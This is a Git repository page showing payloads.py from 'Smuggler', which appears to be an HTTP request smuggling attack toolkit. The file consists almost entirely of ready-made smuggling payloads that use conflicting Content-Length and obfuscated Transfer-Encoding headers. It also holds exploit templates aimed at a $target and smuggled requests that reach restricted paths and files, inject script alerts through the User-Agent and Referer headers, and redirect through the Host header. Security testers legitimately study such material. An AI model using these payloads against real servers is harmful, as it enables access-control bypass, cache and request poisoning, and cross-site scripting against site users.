Home Explore Help
Sign In
epsylon
/
Smuggler
Watch 1
Star 0
Fork 0
Files Issues 0 Pull Requests 0 Wiki
Branch: master
Branches Tags
Smuggler
/
payloads
/
payloads.py

payloads.py 5.1 KB
Permalink History Raw

123456789101112131415161718192021222324252627282930313233343536373839404142 
  1. #!/usr/bin/env python3 
    2. 

  2. # -*- coding: utf-8 -*-"
    3. 

  3. """
    4. 

  4. Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020/2022 - by psy (epsylon@riseup.net)
    5. 

  5. 

  6. You should have received a copy of the GNU General Public License along
    7. 

  7. with PandeMaths; if not, write to the Free Software Foundation, Inc., 51
    8. 

  8. Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
    9. 

  9. """
    10. 

  10. payloads={
    11. 

  11.     'CL-CL-0#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\n\r\nY',
    12. 

  12.     'CL-CL-1#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 1\r\n\r\nY',
    13. 

  13.     'CL-CL-2#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 2\r\nContent-Length: 3\r\n\r\nY',
    14. 

  14.     'TE-TE-0#Content-Type: application/x-www-form-urlencoded\r\nContent-length: 4\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
    15. 

  15.     'TE-TE-1#Content-Type: application/x-www-form-urlencoded\r\nContent-length: 4\r\nTransfer-Encoding: identity, cow\r\nTransfer-encoding: chunked\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
    16. 

  16.     'TE-TE-2#Content-Type: application/x-www-form-urlencoded\r\nContent-length: 4\r\nTransfer-Encoding: chunked\r\nTransfer-encoding: identity, cow\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
    17. 

  17.     'TE-CL-0#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
    18. 

  18.     'TE-CL-1#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 3\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nYPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
    19. 

  19.     'CL-TE-0#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nY',
    20. 

  20.     'CL-TE-1#Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 5\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nY'
    21. 

  21.      }
    22. 

  22. exploits={
    23. 

  23.     'CL-CL-0#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\n\r\n$SMUGGLED',
    24. 

  24.     'CL-CL-1#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: $LC\r\n\r\n$SMUGGLED',
    25. 

  25.     'CL-CL-2#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nContent-Length: $LC\r\n\r\n$SMUGGLED',
    26. 

  26.     'TE-TE-0#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-length: $CL\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\n$SMUGGLEDPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
    27. 

  27.     'TE-TE-1#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-length: $CL\r\nTransfer-Encoding: identity, cow\r\nTransfer-encoding: chunked\r\n\r\n5c\r\n$SMUGGLEDPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
    28. 

  28.     'TE-TE-2#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-length: $CL\r\nTransfer-Encoding: chunked\r\nTransfer-encoding: identity, cow\r\n\r\n5c\r\n$SMUGGLEDPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n',
    29. 

  29.     'TE-CL-0#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\r\n\r\n$SMUGGLED',
    30. 

  30.     'TE-CL-1#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-Length: $CL\r\n\r\n$SMUGGLED',
    31. 

  31.     'CL-TE-0#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n$SMUGGLED',
    32. 

  32.     'CL-TE-1#$method $path $protocol\r\nHost: $target\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n$SMUGGLED'
    33. 

  33.      }
    34. 

  34. methods={
    35. 

  35.     '0#Y',
    36. 

  36.     '1#$method $path $protocol\r\nHost: $target\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\n\r\n$parameter=$SMUGGLED',
    37. 

  37.     '2#GET $restricted HTTP/1.1\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nFoo: Y',
    38. 

  38.     '3#GET $files HTTP/1.1\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL',
    39. 

  39.     "4#GET $path HTTP/1.1\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nUser-Agent: <script>alert('$text')</script>\r\nReferer: <script>alert('$text')</script>\r\nFoo: Y",
    40. 

  40.     "5#GET $PT HTTP/1.1\r\nHost: $redirect\r\n\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $CL\r\nFoo: Y\r\n\r\n"
    41. 

  41.      }
    42. 

  42.